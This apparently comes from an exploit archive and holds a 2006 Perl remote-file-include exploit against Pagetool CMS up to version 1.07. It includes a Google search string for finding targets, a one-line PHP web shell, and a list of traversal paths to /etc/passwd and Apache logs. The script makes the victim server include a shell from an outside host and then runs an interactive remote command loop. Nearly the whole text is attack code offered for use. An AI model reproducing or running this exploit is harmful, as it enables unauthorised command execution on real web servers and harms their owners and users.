[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Pagetool CMS <= 1.07 (pt_upload.php) Remote File Include Vulnerability
# Published : 2006-12-24
# Author : g00ns
# Previous Title : Ultimate PHP Board <= 2.0b1 (chat/login.php) Code Execution Exploit
# Next Title : Open Newsletter <= 2.5 Multiple Remote Vulnerabilities Exploit (update)
#!usr/bin/perl
use LWP::UserAgent;
####################################################################
# ___ ___ _
# / _ / _ | |
# __ _| | | | | | |_ __ ___ _ __ ___| |_
# / _` | | | | | | | '_ / __| | '_ / _ __|
# | (_| | |_| | |_| | | | __ _| | | | __/ |_
# __, |___/ ___/|_| |_|___(_)_| |_|___|__|
# __/ |
# |___/
#
#===========================INFO====================================
# Impact level: HIGH
#
# Google: powered by pagetool or Pagetool Development Team
#
# browser use:
# http://[ site ]/src/admin/pt_upload.php?config_file=[local server file]&ptconf[src]=[ shell ]?
#
#=========================VULN CODE=================================
# Code:
#
# if (file_exists($config_file))
#{
# include($config_file);
#
# ...
# include($ptconf["src"] . "pagetool/pt_profile.inc");
# include($ptconf["src"] . "pagetool/pt_functions.inc");
#===================================================================
#
# Vulnerability Found by: FiSh and godXcel
#
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#---Exploit---#
#==========================================================#
# [Pagetool CMS <=1.07 (RFI)]
# [c]oded by TrinTiTTy -at- g00ns.net
#==========================================================#
#
# ! Vulnerability by FiSh and godXcel !
#
# Shoutz: z3r0, clorox, wicked, synical, ReZEN, grumpy,
# SiCK, and everyone else at g00ns.net
#
# greetz: 13337.org, acircle.us
#
# www.g00ns.net | irc.g00ns.net #g00ns | www.g00ns-forum.net
#
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# # Notes: #
# # Shell example <?passthru($_GET[cmd]);?> #
# # Shell variable: ($_GET[cmd]); #
# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
#==========================================================#
$host = @ARGV[0]; $shell = @ARGV[1];
if ($host =~ /http:/// || $shell =~ /http:///)
{print "nn [-] Don't include http:// in your links!n";usage();exit();}
elsif (@ARGV != 2) {head();usage();exit();}
head();
print "n [!] Scanning for local server config filenn [!] Be patient...n";
# No credz to me for below list..
@cfgs = ("/etc/passwd",
"../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../apache/logs/access.log",
"../../../../../var/log/httpd/error_log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../../../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log");
scan();
sub scan(){
for ($i = 0; $i <=40; ++$i){
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?";
$response = $ag3nt->get($inc);
syswrite STDOUT,".";
$ans = $response->content;
if( $ans =~ /500 Server closed connection without sending any data back/)
{print "nn [-] Couldn't Include Shell...better luck next time.nn";exit;}
elsif ($ans =~ /Cannot execute a blank command/)
{print "n [+] Server File: FOUNDnn [+] Executing Command Shell...nnType quit to exit shelln";commands();}}}
print "nn [-] Couldn't find valid config file...better luck next timenn";exit;
sub commands(){
print "nshell@box $~ ";
$nix=<STDIN>;
chomp($nix);
if ($nix =~ /quit/gmi){print "n [-] Good Byen";exit();}
$ag3nt = LWP::UserAgent->new() || die;
$inc = "http://".$host."/src/admin/pt_upload.php?config_file=".$cfgs[$i]."&ptconf[src]=http://".$shell."?cmd=".$nix.'%00';
$response = $ag3nt->get($inc);
$ans = $response->content;
if ($ans =~ /<b>Warning</b>:/gmi || $ans =~ /<a href=/gmi)
{print " n[-] ERROR: Bad command, permissions, website, or shell.n";commands();}
else {print "n$ans";commands();}}
sub head(){
print q {
|======================================================|
| Pagetool CMS <=1.07 (RFI) |
| [c]oded by TrinTiTTy -at- g00ns.net |
| -----------------------------------------------------|
| |
| Vulnerability by FiSh and godXcel |
| greetz: 13337.org, acircle.us |
| |
| www.g00ns.net |
|======================================================|
}}
sub usage(){
print q{
Usage: perl pagetool07.pl <host> <shell location>
Example: perl pagetool07.pl www.victim.net www.shellsite.com/shell.txt
}
}
# www.Syue.com [2006-12-24]